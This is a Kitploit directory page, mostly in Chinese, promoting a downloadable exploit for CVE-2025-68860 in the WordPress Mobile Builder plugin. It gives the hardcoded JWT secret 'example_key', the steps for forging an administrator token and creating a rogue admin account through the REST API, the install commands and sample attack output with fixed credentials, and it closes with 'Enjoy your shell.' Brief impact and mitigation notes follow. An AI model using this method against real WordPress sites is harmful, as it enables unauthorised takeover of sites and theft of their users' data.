Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-68860 — 针对 WordPress Mobile Builder 插件的 CVE-2025-68860 漏洞利用脚本。使用硬编码密钥生成伪造的 JWT 令牌,以管理员身份进行身份验证,并通过 REST API 创建新的管理员账户。 | Kitploit
工具/GitHubGitHub/dedsecteam-blackhat/cve-2025-68860
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证
GitHubdedsecteam-blackhat/cve-2025-68860

CVE-2025-68860

针对 WordPress Mobile Builder 插件的 CVE-2025-68860 漏洞利用脚本。使用硬编码密钥生成伪造的 JWT 令牌,以管理员身份进行身份验证,并通过 REST API 创建新的管理员账户。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
16个月前尚未审核

WordPress Mobile Builder <= 1.4.2 - 身份验证失效(CVE-2025-68860)

描述

WordPress Mobile builder 插件 1.4.2 及以下版本存在身份验证失效(Broken Authentication)漏洞,攻击者可利用默认密钥 "example_key" 生成有效的 JWT 令牌,并以管理员身份(user_id=1)进行认证。借助该令牌,攻击者可以创建新的管理员账户并完全控制目标站点。

漏洞详情

CVE:CVE-2025-68860

原因:JWT 使用了硬编码密钥 "example_key",且缺乏充分的验证。

漏洞位置:在 Mobile builder 插件中,处理 JWT 认证的文件(例如 class-jwt-auth.php)使用了默认值为 'example_key' 的 JWT_SECRET 常量。该密钥无法通过设置进行修改,因此攻击者可以为任意 user_id 生成令牌。

影响:攻击者可以为 user_id=1(管理员)生成令牌,访问 REST API 端点,并创建具有管理员角色的新用户。

CVSS:高危(评分 8.8)— 攻击向量为网络,无需用户交互。

漏洞利用原理

  1. 脚本生成 JWT 令牌,其 payload 包含 user_id: 1 (admin) dan secret "example_key".

  2. 令牌用于访问 /wp-json/wp/v2/users/,以验证管理员访问权限。

  3. 如果成功,脚本将向 /wp-json/wp/v2/users 发送 POST 请求,以创建新用户:用户名为 dedsec1337,密码为 admin,邮箱为 [email protected],角色为 administrator。

  4. 输出将显示凭据和 API 响应。

环境要求

root@kitploit:~
Python 3.6+

Library: requests, PyJWT, colorama

Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.

安装

root@kitploit:~
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt

输出示例

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit  ║
║ CVE-2025-68860   Priority: HIGH                                 ║
║                    Dedsec Team Exploit                           ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram   : @DedsecTeam1337
GitHub     : https://github.com/DedsecTeam-BlackHat

[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!

==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email    : [email protected]
===================================================

Full API response:
{
  "id": 3,
  "username": "dedsec1337",
  "name": "dedsec1337",
  "email": "[email protected]",
  "roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...

危害

  1. 攻击者可以创建新的管理员账户,访问 WordPress 的全部功能,安装恶意插件、修改内容、窃取用户数据,或利用该站点发起进一步攻击。

  2. 该漏洞可在无需事先认证的情况下被远程利用。

  3. 影响:WordPress 站点被完全入侵。

缓解措施

  1. 立即将 Mobile builder 插件更新到最新版本(>=1.4.3)。

  2. 如果没有可用更新,请暂时禁用该插件。

  3. 检查站点中是否存在可疑用户。

  4. 使用 Web 应用防火墙(WAF)阻止对 REST API 端点的可疑请求。

  5. 作为临时措施,修改插件代码中的密钥(如有可能),并限制对 REST API 的访问。

下载工具